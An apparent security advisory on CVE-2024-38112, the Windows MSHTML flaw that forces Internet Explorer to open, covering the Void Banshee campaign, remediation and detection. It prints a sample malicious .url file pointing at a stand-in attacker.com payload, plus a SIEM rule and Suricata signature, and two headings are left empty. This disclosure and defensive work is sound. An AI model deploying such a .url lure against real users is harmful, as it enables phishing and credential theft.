CVE-2024-38112: Windows MSHTML — Platform Spoofing

Background

Internet Explorer has been “retired” — Microsoft officially ended support in June 2022 and it’s been hidden from users since. But the MSHTML rendering engine it’s built on (also called Trident) still exists in Windows. That’s the problem.

CVE-2024-38112 is a clever attack: craft a .url file that, when opened, silently launches Internet Explorer instead of the default browser, pointing at an attacker-controlled page. IE’s security model is ancient and full of holes that modern browsers don’t have. From there, you can socially engineer the user or exploit old IE vulnerabilities that Microsoft is no longer patching.

This was being exploited as a zero-day by a threat group called Void Banshee before the July 2024 patch. It shows that even “retired” software can bite you if it’s still present on the system.

Technical Mechanism

Windows Internet Shortcut files (.url) use an MHTML: URI scheme handler that can force the file to be processed by MSHTML — the Internet Explorer engine. By crafting a .url file with a specific URI scheme, an attacker can bypass Windows’ default browser setting and force IE to open a URL.

A malicious .url file might look like:

[InternetShortcut]
URL=mhtml:https://attacker.com/payload!https://attacker.com/payload.mhtml

When this file is opened:

1. Windows parses the MHTML: URI handler
2. This invokes MSHTML/IE to process the document
3. IE opens the attacker’s page in the context of the ancient IE security model
4. The attacker’s page can use deprecated technologies (like HTA files, VBScript, or old ActiveX controls) that modern browsers block entirely

Void Banshee chained this with a VBScript/HTA delivery mechanism to achieve code execution on Windows systems. The chain bypasses defences that assume IE is not running.

Real-World Exploitation Evidence

Trend Micro’s Threat Intelligence team identified Void Banshee exploiting this zero-day in 2024:

• Void Banshee — a threat actor targeting organisations in North America, Europe, and Southeast Asia, primarily motivated by data theft and credential harvesting
• Atlantic Stealer / Atlantida Stealer — an information stealer deployed through this vulnerability chain, targeting credentials, browser data, and cryptocurrency wallets
• HTA delivery — malicious HTML Application files served via the MSHTML handler, using VBScript to download and execute payloads
• Phishing delivery — malicious .url files delivered via phishing emails or embedded in archives

The group targeted sectors including education, government, and healthcare.

Impact Assessment

• Credential theft — Atlantida Stealer harvests browser passwords, cookies, cryptocurrency wallet data
• Code execution via deprecated IE — bypasses modern browser security sandbox models
• Bypasses URL file defences — many organisations allow .url files since they’re commonly used for legitimate web shortcuts
• Multi-stage payload capability — the IE/MSHTML execution context enables VBScript and HTA execution that modern browsers would block
• User trust exploitation — users who think they’re opening a harmless link are actually running malicious HTA code

Affected Versions

Remediation Steps

1. Apply July 2024 Patch Tuesday updates
2. Additionally, you can disable the MHTML protocol handler via registry:

   reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MHTML" /f

3. Block or quarantine .url file attachments in email gateways — they have minimal legitimate business use and are frequently abused
4. Use AppLocker or Windows Defender Application Control (WDAC) to block execution of .hta files:

   # Via AppLocker, create a rule blocking *.hta execution
   # Or use WDAC policy to block mshta.exe

5. If IE/MSHTML is needed by legacy applications, confine those applications via AppLocker or virtualisation
6. Scan for Atlantida Stealer indicators on endpoints

Detection Guidance

Endpoint monitoring — look for:

• mshta.exe execution from unexpected parent processes
• .hta files downloaded or executed from unusual locations
• iexplore.exe process creation (should be rare since IE retirement)

SIEM rule:

process_name IN ("iexplore.exe", "mshta.exe") AND 
NOT parent_name IN known_parent_list AND
timestamp > "2023-06-15"

Any iexplore.exe launching in a modern Windows environment (post-IE retirement) should be treated as suspicious.

Email security — alert on .url attachments and quarantine for review.

Suricata signature:

alert http any any -> any any (msg:"CVE-2024-38112 MHTML Handler Exploit Delivery"; flow:established,from_server; file.data; content:"mhtml:"; content:".hta"; distance:0; classtype:web-application-attack; sid:2034018; rev:1;)

Timeline